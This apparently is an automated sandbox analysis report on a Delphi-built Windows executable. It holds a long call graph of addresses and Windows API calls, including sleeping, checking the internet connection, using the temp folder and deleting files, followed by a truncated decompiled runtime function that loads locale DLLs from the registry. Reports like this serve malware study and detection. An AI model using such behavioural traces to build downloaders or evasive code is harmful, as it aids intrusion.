48373->48369 48374->48367 48375->48369 48376 421d84 48378 421d8b 48376->48378 48377 421dd4 48378->48377 48382 41ad54 48378->48382 48385 421d4c 66 API calls 48378->48385 48386 421ccc 66 API calls 48378->48386 48383 41ac6c 66 API calls 48382->48383 48384 41ad5d 48383->48384 48384->48378 48385->48378 48386->48378 48387 434434 48390 43e6bc 48387->48390 48396 43e6ef 48390->48396 48391 43e768 GetClassInfoA 48392 43e78f 48391->48392 48393 43e7cd 48392->48393 48394 43e7a0 UnregisterClassA 48392->48394 48395 43e7ad RegisterClassA 48392->48395 48418 43e88c 48393->48418 48394->48395 48395->48393 48398 43e7c8 48395->48398 48396->48391 48404 43e71c 48396->48404 48445 406a70 66 API calls 48396->48445 48447 40e79c 68 API calls 48398->48447 48400 43e751 48446 40d180 66 API calls 48400->48446 48402 43e7f1 GetWindowLongA 48406 43e827 48402->48406 48407 43e806 GetWindowLongA 48402->48407 48404->48391 48421 40a1d4 48406->48421 48407->48406 48408 43e818 SetWindowLongA 48407->48408 48408->48406 48412 43e83b 48432 424e24 48412->48432 48414 43e845 48415 4049c0 21 API calls 48414->48415 48416 43445b 48415->48416 48449 407a8c 48418->48449 48420 43e7e3 48420->48402 48448 40e79c 68 API calls 48420->48448 48422 40a1e2 48421->48422 48423 40a1d8 48421->48423 48425 441a14 IsIconic 48422->48425 48454 40277c 21 API calls 48423->48454 48426 441a51 GetWindowRect 48425->48426 48427 441a2c GetWindowPlacement 48425->48427 48428 441a5e GetWindowLongA 48426->48428 48427->48428 48429 441a73 GetWindowLongA 48428->48429 48430 441a99 48428->48430 48429->48430 48431 441a87 ScreenToClient ScreenToClient 48429->48431 48430->48412 48431->48430 48433 424e59 48432->48433 48434 424f8c 48432->48434 48455 424168 RtlEnterCriticalSection 48433->48455 48458 4049e4 48434->48458 48438 424f6d 48457 424174 RtlLeaveCriticalSection 48438->48457 48440 424f84 48440->48414 48441 424e63 48441->48438 48456 408f88 CompareStringA 48441->48456 48443 424f5e CreateFontIndirectA 48443->48438 48444 424efa 48444->48443 48445->48400 48446->48404 48447->48393 48448->48402 48453 402c0c 48449->48453 48451 407a9f CreateWindowExA 48452 407ad9 48451->48452 48452->48420 48453->48451 48454->48422 48455->48441 48456->48444 48457->48440 48460 4049ea 48458->48460 48459 404a10 48459->48414 48460->48459 48462 40277c 21 API calls 48460->48462 48462->48460 48463 497cf0 48464 497cf8 48463->48464 48464->48464 48465 497cff Sleep 48464->48465 48547 4737b0 GetTempPathA 48465->48547 48467 497d22 48548 472d44 37 API calls 48467->48548 48469 497d37 48549 404d40 48469->48549 48471 497d4c 48472 4737b0 GetTempPathA 48471->48472 48473 497d54 48472->48473 48474 472d44 37 API calls 48473->48474 48475 497d69 48474->48475 48476 404d40 35 API calls 48475->48476 48477 497d7e 48476->48477 48478 474d34 InternetGetConnectedState 48477->48478 48488 497d87 48478->48488 48479 49811b 48480 4049e4 21 API calls 48479->48480 48481 498135 48480->48481 48482 4049c0 21 API calls 48481->48482 48484 49813d 48482->48484 48483 404a58 21 API calls 48483->48488 48485 4049e4 21 API calls 48484->48485 48487 49814a 48485->48487 48486 4967d4 21 API calls 48486->48488 48488->48479 48488->48483 48488->48486 48489 474d50 54 API calls 48488->48489 48490 497f6d 48488->48490 48491 497e02 48488->48491 48489->48488 48490->48488 48492 4967d4 21 API calls 48490->48492 48501 497f9d 48490->48501 48493 430158 35 API calls 48491->48493 48492->48490 48494 497e11 48493->48494 48495 4758e8 35 API calls 48494->48495 48496 497e3a 48495->48496 48497 404a14 35 API calls 48496->48497 48499 497e47 48497->48499 48498 404a58 21 API calls 48500 497f63 48498->48500 48503 4758e8 35 API calls 48499->48503 48500->48479 48500->48498 48500->48501 48502 404a58 21 API calls 48500->48502 48501->48479 48501->48500 48504 4967d4 21 API calls 48501->48504 48507 474d50 54 API calls 48501->48507 48509 49801a 48501->48509 48502->48501 48505 497e6e 48503->48505 48504->48501 48506 404a14 35 API calls 48505->48506 48508 497e7b 48506->48508 48507->48501 48511 4758e8 35 API calls 48508->48511 48510 49a3e0 385 API calls 48509->48510 48512 498026 48510->48512 48513 497ea2 48511->48513 48515 472ef0 35 API calls 48512->48515 48514 404a14 35 API calls 48513->48514 48516 497eaf 48514->48516 48517 498058 48515->48517 48518 4758e8 35 API calls 48516->48518 48519 498067 48517->48519 48520 4980b6 48517->48520 48521 497ed6 48518->48521 48523 473490 24 API calls 48519->48523 48522 473490 24 API calls 48520->48522 48524 404a14 35 API calls 48521->48524 48526 4980cc 48522->48526 48527 49807c 48523->48527 48525 497ee3 48524->48525 48535 4758e8 35 API calls 48525->48535 48528 49808c 48526->48528 48531 45a800 PostQuitMessage 48526->48531 48529 49808e 48527->48529 48530 498080 48527->48530 48528->48479 48533 473490 24 API calls 48529->48533 48532 45a800 PostQuitMessage 48530->48532 48531->48528 48532->48528 48534 4980a4 48533->48534 48534->48528 48537 45a800 PostQuitMessage 48534->48537 48536 497f0a 48535->48536 48538 404a14 35 API calls 48536->48538 48537->48528 48539 497f17 48538->48539 48540 409628 66 API calls 48539->48540 48541 497f21 48540->48541 48542 409628 66 API calls 48541->48542 48543 497f37 48542->48543 48544 4967d4 21 API calls 48543->48544 48545 497f3f 48543->48545 48544->48545 48546 409bac DeleteFileA 48545->48546 48546->48500 48547->48467 48548->48469 48550 404d51 48549->48550 48551 404d77 48550->48551 48552 404d8e 48550->48552 48558 40500c 48551->48558 48564 404a84 48552->48564 48555 404d84 48556 404dbf 48555->48556 48569 404a14 48555->48569 48559 405019 48558->48559 48563 405049 48558->48563 48561 405025 48559->48561 48562 404a84 35 API calls 48559->48562 48560 4049c0 21 API calls 48560->48561 48561->48555 48562->48563 48563->48560 48565 404a88 48564->48565 48566 404aac 48564->48566 48575 40275c 48565->48575 48566->48555 48570 404a18 48569->48570 48573 404a28 48569->48573 48572 404a84 35 API calls 48570->48572 48570->48573 48571 404a56 48571->48556 48572->48573 48573->48571 48637 40277c 21 API calls 48573->48637 48576 402761 48575->48576 48577 402774 48575->48577 48581 402188 48576->48581 48577->48555 48578 402767 48578->48577 48592 40286c 21 API calls 48578->48592 48582 4021a1 48581->48582 48583 40219c 48581->48583 48585 4021ce RtlEnterCriticalSection 48582->48585 48586 4021d8 48582->48586 48589 4021ad 48582->48589 48593 401a9c RtlInitializeCriticalSection 48583->48593 48585->48586 48586->48589 48600 402094 48586->48600 48589->48578 48590 402303 48590->48578 48591 4022f9 RtlLeaveCriticalSection 48591->48590 48592->48577 48594 401ac0 RtlEnterCriticalSection 48593->48594 48595 401aca 48593->48595 48594->48595 48596 401ae8 LocalAlloc 48595->48596 48597 401b02 48596->48597 48598 401b51 48597->48598 48599 401b47 RtlLeaveCriticalSection 48597->48599 48598->48582 48599->48598 48603 4020a4 48600->48603 48601 4020d0 48605 4020f4 48601->48605 48611 401ea8 9 API calls 48601->48611 48603->48601 48603->48605 48606 402008 48603->48606 48605->48590 48605->48591 48612 40185c 48606->48612 48608 402018 48609 402025 48608->48609 48621 401f7c 9 API calls 48608->48621 48609->48603 48611->48605 48615 401878 48612->48615 48614 401882 48622 401748 48614->48622 48615->48614 48617 40188e 48615->48617 48619 4018d3 48615->48619 48626 4015b4 48615->48626 48634 4014b0 LocalAlloc 48615->48634 48617->48608 48635 401690 VirtualFree 48619->48635 48621->48609 48624 40178e 48622->48624 48623 4017be 48623->48617 48624->48623 48625 4017aa VirtualAlloc 48624->48625 48625->48623 48625->48624 48627 4015c3 VirtualAlloc 48626->48627 48629 4015f0 48627->48629 48630 401613 48627->48630 48636 401468 LocalAlloc 48629->48636 48630->48615 48632 4015fc 48632->48630 48633 401600 VirtualFree 48632->48633 48633->48630 48634->48615 48635->48617 48636->48632 48637->48571 48638 45288c 48639 4528a8 48638->48639 48640 452897 48638->48640 48641 4528a1 48640->48641 48642 4528aa 48640->48642 48647 452868 48641->48647 48653 4523c0 72 API calls 48642->48653 48645 4528b7 48654 4523c0 72 API calls 48645->48654 48648 452874 48647->48648 48649 45288a 48647->48649 48655 451c74 48648->48655 48649->48639 48652 451c74 72 API calls 48652->48649 48653->48645 48654->48639 48656 451c92 48655->48656 48657 451d0d 48655->48657 48658 451d0f 48656->48658 48663 451ca0 48656->48663 48657->48652 48659 4523a8 72 API calls 48658->48659 48659->48657 48660 451cf6 48664 4523a8 48660->48664 48662 43e3f8 66 API calls 48662->48663 48663->48660 48663->48662 48665 4523b1 48664->48665 48668 4528e8 48665->48668 48667 4523be 48667->48657 48669 4529da 48668->48669 48670 4528ff 48668->48670 48669->48667 48670->48669 48689 451e88 48670->48689 48673 45295f 48676 451e88 2 API calls 48673->48676 48674 452939 48675 4524f4 72 API calls 48674->48675 48677 45294b 48675->48677 48678 45296d 48676->48678 48679 4524f4 72 API calls 48677->48679 48680 452997 48678->48680 48681 452971 48678->48681 48682 45295d 48679->48682 48692 4524f4 48680->48692 48683 4524f4 72 API calls 48681->48683 48682->48667 48685 452983 48683->48685 48687 4524f4 72 API calls 48685->48687 48687->48682 48688 4524f4 72 API calls 48688->48682 48704 451e08 48689->48704 48691 451e96 48691->48673 48691->48674 48693 45251a 48692->48693 48694 452533 48693->48694 48695 451e08 2 API calls 48693->48695 48696 451e08 2 API calls 48694->48696 48695->48694 48697 452581 48696->48697 48714 4523ec 48697->48714 48699 45259b 48718 452270 69 API calls 48699->48718 48701 4525cc 48702 451e08 2 API calls 48701->48702 48703 4525d7 48702->48703 48703->48688 48705 441704 48704->48705 48706 451e25 GetWindowLongA 48705->48706 48707 451e62 48706->48707 48708 451e42 48706->48708 48713 451d8c GetWindowLongA 48707->48713 48712 451d8c GetWindowLongA 48708->48712 48711 451e4e 48711->48691 48712->48711 48713->48711 48715 452429 48714->48715 48719 424950 48715->48719 48717 4524ce 48717->48699 48718->48701 48720 424954 GetSysColor 48719->48720 48721 42495f 48719->48721 48720->48721 48721->48717 48722 49ab80 48733 406d28 GetModuleHandleA 48722->48733 48724 49ab90 48737 45a28c 48724->48737 48728 49abc5 48752 45a714 124 API calls 48728->48752 48730 49abd1 48753 40484c 48730->48753 48734 406d5b 48733->48734 48765 404684 48734->48765 48738 45a2ae 48737->48738 48739 45a2eb 48737->48739 48985 45a240 48738->48985 48740 404a14 35 API calls 48739->48740 48742 45a2e9 48740->48742 48743 4049c0 21 API calls 48742->48743 48744 45a30d 48743->48744 48748 45a694 48744->48748 48745 45a2b8 48745->48742 48746 45a2d4 SetWindowTextA 48745->48746 48747 4049c0 21 API calls 48746->48747 48747->48742 48749 45a6a7 48748->48749 48991 452e3c 48749->48991 48750 45a6c8 48750->48728 48752->48730 48754 404865 48753->48754 48755 404884 48754->48755 48756 404895 48754->48756 49213 4047c0 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 48755->49213 49207 4045c4 48756->49207 48759 40488e 48759->48756 48760 4048aa 48761 4048d0 FreeLibrary 48760->48761 48764 4048d6 48760->48764 48761->48764 48762 40490b 48763 404903 ExitProcess 48764->48762 48764->48763 48766 4046b7 48765->48766 48769 404624 48766->48769 48770 404633 48769->48770 48771 404660 48769->48771 48770->48771 48774 40275c 35 API calls 48770->48774 48775 446564 48770->48775 48789 405f94 48770->48789 48771->48724 48774->48770 48776 4465dc 48775->48776 48777 44657e GetVersion 48775->48777 48776->48770 48793 446330 GetCurrentProcessId 48777->48793 48781 4465a2 48825 41a548 68 API calls 48781->48825 48783 4465ac 48826 41a4f4 68 API calls 48783->48826 48785 4465bc 48827 41a4f4 68 API calls 48785->48827 48787 4465cc 48828 41a4f4 68 API calls 48787->48828 48790 405fa4 GetModuleFileNameA 48789->48790 48791 405fc0 48789->48791 48966 4061d0 GetModuleFileNameA RegOpenKeyExA 48790->48966 48791->48770 48829 40a664 48793->48829 48796 404a14 35 API calls 48797 446379 48796->48797 48798 446383 GlobalAddAtomA GetCurrentThreadId 48797->48798 48799 40a664 66 API calls 48798->48799 48800 4463bd 48799->48800 48801 404a14 35 API calls 48800->48801 48802 4463ca 48801->48802 48803 4463d4 GlobalAddAtomA 48802->48803 48832 404e80 48803->48832 48807 446401 48838 445f34 48807->48838 48809 44640b 48846 445d5c 48809->48846 48811 446417 48850 457fc8 48811->48850 48813 44642a 48867 4590ac 48813->48867 48815 446440 48881 41a634 68 API calls 48815->48881 48817 44646a GetModuleHandleA 48818 44648a 48817->48818 48819 44647a GetProcAddress 48817->48819 48820 4049c0 21 API calls 48818->48820 48819->48818 48821 44649f 48820->48821 48822 4049c0 21 API calls 48821->48822 48823 4464a7 48822->48823 48824 41a4a8 68 API calls 48823->48824 48824->48781 48825->48783 48826->48785 48827->48787 48828->48776 48882 40a678 48829->48882 48833 404e84 RegisterClipboardFormatA 48832->48833 48834 41af14 48833->48834 48835 41af1a 48834->48835 48836 41af2f RtlInitializeCriticalSection 48835->48836 48837 41af44 48836->48837 48837->48807 48839 4460a1 48838->48839 48840 445f48 SetErrorMode 48838->48840 48839->48809 48841 445f6c GetModuleHandleA GetProcAddress 48840->48841 48842 445f88 48840->48842 48841->48842 48843 445f95 LoadLibraryA 48842->48843 48844 446083 SetErrorMode 48842->48844 48843->48844 48845 445fb1 10 API calls 48843->48845 48844->48809 48845->48844 48847 445d62 48846->48847 48848 445ed0 33 API calls 48847->48848 48849 445dd0 48848->48849 48849->48811 48851 457fd2 48850->48851 48902 421b3c 48851->48902 48853 457fe8 48906 458384 LoadCursorA 48853->48906 48856 458021 48857 45805d 733AAC50 733AAD70 733AB380 48856->48857 48858 458093 48857->48858 48911 424c3c 48858->48911 48860 45809f 48861 424c3c 37 API calls 48860->48861 48862 4580b1 48861->48862 48863 424c3c 37 API calls 48862->48863 48864 4580c3 48863->48864 48865 4587a4 48 API calls 48864->48865 48866 4580d0 48865->48866 48866->48813 48868 4590bb 48867->48868 48869 421b3c 66 API calls 48868->48869 48870 4590d1 48869->48870 48871 45917c LoadIconA 48870->48871 48929 42b7c8 48871->48929 48873 45919f GetModuleFileNameA OemToCharA 48874 4591e8 48873->48874 48875 45920e CharLowerA 48874->48875 48876 459231 48875->48876 48877 459242 48876->48877 48931 4593b4 48876->48931 48955 45b188 21 API calls 48877->48955 48880 459264 48880->48815 48881->48817 48883 40a69c 48882->48883 48885 40a6c7 48883->48885 48895 40a26c 66 API calls 48883->48895 48886 40a71f 48885->48886 48893 40a6dc 48885->48893 48897 404ab0 48886->48897 48888 40a715 48891 40500c 35 API calls 48888->48891 48889 40a673 48889->48796 48890 4049c0 21 API calls 48890->48893 48891->48889 48892 40500c 35 API calls 48892->48893 48893->48888 48893->48890 48893->48892 48896 40a26c 66 API calls 48893->48896 48895->48885 48896->48893 48898 404a84 35 API calls 48897->48898 48899 404ac0 48898->48899 48900 4049c0 21 API calls 48899->48900 48901 404ad8 48900->48901 48901->48889 48903 421b43 48902->48903 48905 421b66 48903->48905 48915 421cf4 66 API calls 48903->48915 48905->48853 48907 4583a3 48906->48907 48908 4583bc LoadCursorA 48907->48908 48910 45800b GetKeyboardLayout 48907->48910 48916 45843c 48908->48916 48910->48856 48912 424c42 48911->48912 48919 424180 48912->48919 48914 424c64 48914->48860 48915->48905 48917 40275c 35 API calls 48916->48917 48918 45844f 48917->48918 48918->48907 48920 42419b 48919->48920 48927 424168 RtlEnterCriticalSection 48920->48927 48922 4241a5 48923 40275c 35 API calls 48922->48923 48926 424202 48922->48926 48923->48926 48925 424253 48925->48914 48928 424174 RtlLeaveCriticalSection 48926->48928 48927->48922 48928->48925 48930 42b7d4 48929->48930 48930->48873 48932 4593dd 48931->48932 48933 45953f 48931->48933 48932->48933 48956 422bcc 48932->48956 48934 4049c0 21 API calls 48933->48934 48935 459554 48934->48935 48935->48877 48937 4593f6 GetClassInfoA 48938 45941c RegisterClassA 48937->48938 48943 459451 48937->48943 48939 459435 48938->48939 48938->48943 48963 406a70 66 API calls 48939->48963 48941 459442 48964 40d144 35 API calls 48941->48964 48959 407ae4 48943->48959 48945 4594a8 48946 4049c0 21 API calls 48945->48946 48947 4594b6 SetWindowLongA 48946->48947 48948 4594d6 48947->48948 48949 459501 GetSystemMenu DeleteMenu DeleteMenu 48947->48949 48950 45a038 73 API calls 48948->48950 48949->48933 48951 459532 DeleteMenu 48949->48951 48952 4594dd SendMessageA 48950->48952 48951->48933 48953 45a038 73 API calls 48952->48953 48954 4594f5 SetClassLongA 48953->48954 48954->48949 48955->48880 48957 422bdc VirtualAlloc 48956->48957 48958 422c0a 48956->48958 48957->48958 48958->48937 48965 402c0c 48959->48965 48961 407af7 CreateWindowExA 48962 407b2f 48961->48962 48962->48945 48963->48941 48964->48943 48965->48961 48967 406253 48966->48967 48968 406213 RegOpenKeyExA 48966->48968 48984 406018 12 API calls 48967->48984 48968->48967 48969 406231 RegOpenKeyExA 48968->48969 48969->48967 48971 4062dc lstrcpyn GetThreadLocale GetLocaleInfoA 48969->48971 48973 406313 48971->48973 48974 4063f6 48971->48974 48972 406278 RegQueryValueExA 48975 406298 RegQueryValueExA 48972->48975 48976 4062b6 RegCloseKey 48972->48976 48973->48974 48977 406323 lstrlen 48973->48977 48974->48791 48975->48976 48976->48791 48979 40633b 48977->48979 48979->48974 48980 406360 lstrcpyn LoadLibraryExA 48979->48980 48981 406388 48979->48981 48980->48981 48981->48974 48982 406392 lstrcpyn LoadLibraryExA 48981->48982 48982->48974 48983 4063c4 lstrcpyn LoadLibraryExA 48982->48983 48983->48974 48984->48972 48986 45a275 48985->48986 48987 45a255 GetWindowTextA 48985->48987 48989 404a14 35 API calls 48986->48989 48988 404ab0 35 API calls 48987->48988 48990 45a273 48988->48990 48989->48990 48990->48745 48992 452e52 48991->48992 48993 452f66 48992->48993 49000 41aa2c 48992->49000 48993->48750 48995 452ee2 48999 452f2b 48995->48999 49010 406a70 66 API calls 48995->49010 48997 452f19 49011 40d180 66 API calls 48997->49011 48999->48750 49001 41aa42 49000->49001 49002 41aa77 49001->49002 49024 41a8a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49001->49024 49012 41a984 49002->49012 49006 41aaa2 49008 41aaba 49006->49008 49026 41a928 66 API calls 49006->49026 49008->48995 49010->48997 49011->48999 49013 41aa02 49012->49013 49016 41a9ae 49012->49016 49014 4049c0 21 API calls 49013->49014 49015 41aa19 49014->49015 49015->49006 49025 41a8f8 66 API calls 49015->49025 49016->49013 49017 41a984 145 API calls 49016->49017 49018 41a9c6 49017->49018 49027 405f8c 49018->49027 49022 41a9f4 49035 41a81c 49022->49035 49024->49002 49025->49006 49026->49008 49044 405f64 VirtualQuery 49027->49044 49030 405fdc 49031 406003 49030->49031 49032 405fe6 49030->49032 49031->49022 49032->49031 49033 405f94 30 API calls 49032->49033 49034 405ffc 49033->49034 49034->49022 49036 41a82d 49035->49036 49037 41a83c FindResourceA 49036->49037 49038 41a899 49037->49038 49039 41a84c 49037->49039 49038->49013 49046 41e0d0 49039->49046 49041 41a85d 49050 41da30 49041->49050 49043 41a878 49043->49013 49045 405f7e 49044->49045 49045->49030 49047 41e0da 49046->49047 49055 41e198 FindResourceA 49047->49055 49049 41e108 49049->49041 49067 41e254 49050->49067 49052 41da4c 49071 420288 49052->49071 49054 41da67 49054->49043 49056 41e1c4 LoadResource 49055->49056 49057 41e1bd 49055->49057 49058 41e1d7 49056->49058 49059 41e1de SizeofResource LockResource 49056->49059 49065 41e128 66 API calls 49057->49065 49066 41e128 66 API calls 49058->49066 49063 41e1fc 49059->49063 49061 41e1c3 49061->49056 49063->49049 49064 41e1dd 49064->49059 49065->49061 49066->49064 49068 41e25e 49067->49068 49069 40275c 35 API calls 49068->49069 49070 41e277 49069->49070 49070->49052 49100 420670 49071->49100 49074 420300 49161 420694 49074->49161 49075 420335 49076 420694 66 API calls 49075->49076 49078 420346 49076->49078 49080 42034f 49078->49080 49081 42035c 49078->49081 49083 420694 66 API calls 49080->49083 49084 420694 66 API calls 49081->49084 49089 420328 49083->49089 49086 420377 49084->49086 49085 420313 49088 420694 66 API calls 49085->49088 49171 420228 66 API calls 49086->49171 49088->49089 49105 41a0e8 49089->49105 49093 4203d0 49094 420460 49093->49094 49124 425a84 49093->49124 49128 4534ec 49093->49128 49151 425d3c 49093->49151 49095 41ac6c 66 API calls 49094->49095 49096 4204a0 49094->49096 49095->49094 49096->49054 49172 41ee34 49100->49172 49103 4202c1 49103->49074 49103->49075 49106 41a0f5 49105->49106 49178 419fd4 RtlEnterCriticalSection 49106->49178 49108 41a1cf 49179 41a08c RtlLeaveCriticalSection 49108->49179 49109 41ac6c 66 API calls 49115 41a12c 49109->49115 49112 41a1e6 49116 406cdc 49112->49116 49113 41ac6c 66 API calls 49114 41a18e 49113->49114 49114->49108 49114->49113 49115->49109 49115->49114 49180 419b10 66 API calls 49115->49180 49117 406d11 TlsGetValue 49116->49117 49118 406ceb 49116->49118 49119 406cf6 49117->49119 49120 406d1b 49117->49120 49118->49093 49181 406c98 LocalAlloc TlsSetValue 49119->49181 49120->49093 49122 406cfb TlsGetValue 49123 406d0a 49122->49123 49123->49093 49125 425d3c 83 API calls 49124->49125 49126 425a9a 49125->49126 49127 425ab3 GetTextExtentPoint32A 49126->49127 49127->49094 49129 4534ff 49128->49129 49182 43d6f8 49129->49182 49131 45354a 49132 4535b9 49131->49132 49134 4536b6 49131->49134 49137 4535aa MulDiv 49131->49137 49187 453874 84 API calls 49132->49187 49139 45371b 49134->49139 49190 452b4c 74 API calls 49134->49190 49135 4535d2 49135->49134 49188 452b4c 74 API calls 49135->49188 49186 424ff8 39 API calls 49137->49186 49138 453709 49191 4411c8 66 API calls 49138->49191 49139->49094 49143 4535f3 49189 4411c8 66 API calls 49143->49189 49145 453606 49146 453635 49145->49146 49147 453612 MulDiv 49145->49147 49148 453664 49146->49148 49149 453641 MulDiv 49146->49149 49147->49146 49148->49134 49150 453670 MulDiv MulDiv 49148->49150 49149->49148 49150->49134 49152 425da2 49151->49152 49157 425d55 49151->49157 49152->49094 49153 425d79 49154 425d8a 49153->49154 49197 425dd8 28 API calls 49153->49197 49156 425d96 49154->49156 49198 425e04 6 API calls 49154->49198 49156->49152 49199 425e34 10 API calls 49156->49199 49157->49153 49196 40d200 66 API calls 49157->49196 49162 41ee34 66 API calls 49161->49162 49163 4206a9 49162->49163 49164 404ab0 35 API calls 49163->49164 49165 4206b7 49164->49165 49200 404ed8 49165->49200 49168 41ee34 66 API calls 49169 42030b 49168->49169 49170 41a398 68 API calls 49169->49170 49170->49085 49171->49089 49174 41ee3f 49172->49174 49173 41ee79 49173->49103 49176 41e8f4 66 API calls 49173->49176 49174->49173 49177 41ee80 66 API calls 49174->49177 49176->49103 49177->49174 49178->49115 49179->49112 49180->49115 49181->49122 49183 43d70a 49182->49183 49192 43a3b8 49183->49192 49185 43d722 49185->49131 49186->49132 49187->49135 49188->49143 49189->49145 49190->49138 49191->49139 49193 43a3d4 49192->49193 49194 421f9c 111 API calls 49193->49194 49195 43a3ea 49194->49195 49195->49185 49196->49153 49197->49154 49198->49156 49199->49152 49201 404e8c 49200->49201 49202 404a84 35 API calls 49201->49202 49204 404ec7 49201->49204 49203 404ea3 49202->49203 49203->49204 49206 40277c 21 API calls 49203->49206 49204->49168 49206->49204 49208 4045d6 49207->49208 49209 404600 49207->49209 49208->49209 49214 478cb0 49208->49214 49220 406b3c 49208->49220 49230 435634 WinHelpA 49208->49230 49209->48760 49213->48759 49215 478cc9 49214->49215 49216 478d18 49214->49216 49217 478d03 49215->49217 49218 478cfe 742FF460 49215->49218 49216->49208 49231 4054c8 21 API calls 49217->49231 49218->49217 49221 406b55 49220->49221 49223 406b78 49220->49223 49232 40308c 49221->49232 49223->49208 49225 40308c 4 API calls 49226 406b69 49225->49226 49227 40308c 4 API calls 49226->49227 49228 406b73 49227->49228 49239 401b60 49228->49239 49230->49208 49231->49216 49233 4030cb 49232->49233 49234 40309c 49232->49234 49235 4030c9 49233->49235 49252 4028e4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49233->49252 49234->49233 49237 4030a2 49234->49237 49235->49225 49237->49235 49251 4028e4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49237->49251 49240 401b71 49239->49240 49241 401c3d 49239->49241 49242 401b92 LocalFree 49240->49242 49243 401b88 RtlEnterCriticalSection 49240->49243 49241->49223 49244 401bc5 49242->49244 49243->49242 49245 401bb3 VirtualFree 49244->49245 49246 401bcd 49244->49246 49245->49244 49247 401bf4 LocalFree 49246->49247 49248 401c0b 49246->49248 49247->49247 49247->49248 49249 401c21 RtlLeaveCriticalSection 49248->49249 49250 401c2b RtlDeleteCriticalSection 49248->49250 49249->49250 49250->49223 49251->49235 49252->49235 49253 43eaf8 733B9840 49254 43eb29 49253->49254 49255 43eb2e 49253->49255 49257 40e79c 68 API calls 49254->49257 49257->49255 49258 41dadc 49261 409974 WriteFile 49258->49261 49262 409991 49261->49262 49263 41bd4e 49264 41bd5f 49263->49264 49267 4348a8 49264->49267 49268 4348d3 49267->49268 49269 43497d 49267->49269 49271 4348e3 SendMessageA 49268->49271 49270 4049c0 21 API calls 49269->49270 49272 41bd6c 49270->49272 49273 434901 49271->49273 49274 4348ef 49271->49274 49277 434912 SendMessageA 49273->49277 49285 404ccc 49274->49285 49276 4348ff 49279 434959 SendMessageA 49276->49279 49277->49269 49278 43491e 49277->49278 49280 43492e SendMessageA 49278->49280 49282 434967 49279->49282 49280->49269 49281 434938 49280->49281 49283 404ccc 35 API calls 49281->49283 49284 434977 SendMessageA 49282->49284 49283->49276 49284->49269 49287 404cd0 49285->49287 49294 404c88 49285->49294 49286 404a14 49292 404a84 35 API calls 49286->49292 49296 404a28 49286->49296 49287->49286 49288 404ce0 49287->49288 49289 404cee 49287->49289 49287->49294 49295 404a14 35 API calls 49288->49295 49291 404a84 35 API calls 49289->49291 49290 404a56 49290->49276 49303 404d01 49291->49303 49292->49296 49293 404ccb 49293->49276 49294->49286 49294->49293 49297 404c96 49294->49297 49295->49294 49296->49290 49307 40277c 21 API calls 49296->49307 49299 404cc0 49297->49299 49300 404ca9 49297->49300 49301 40500c 35 API calls 49299->49301 49302 40500c 35 API calls 49300->49302 49304 404cae 49301->49304 49302->49304 49305 404a14 35 API calls 49303->49305 49304->49276 49306 404d2d 49305->49306 49306->49276 49307->49290

                                                    Executed Functions

                                                    Function 004061D0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 65%
                                                    			E004061D0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x4062d5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00406018( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040643C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E004062DC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L0040131C();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401324();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L0040131C();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L0040131C();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L0040131C();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























                                                    0x004061d1
                                                    0x004061d3
                                                    0x004061db
                                                    0x004061ec
                                                    0x004061f1
                                                    0x0040620a
                                                    0x00406211
                                                    0x00406253
                                                    0x00406255
                                                    0x00406256
                                                    0x0040625b
                                                    0x0040625e
                                                    0x00406261
                                                    0x00406273
                                                    0x00406296
                                                    0x004062b6
                                                    0x004062b6
                                                    0x004062ba
                                                    0x004062c0
                                                    0x004062c3
                                                    0x004062c6
                                                    0x004062d4
                                                    0x00406213
                                                    0x00406228
                                                    0x0040622f
                                                    0x00000000
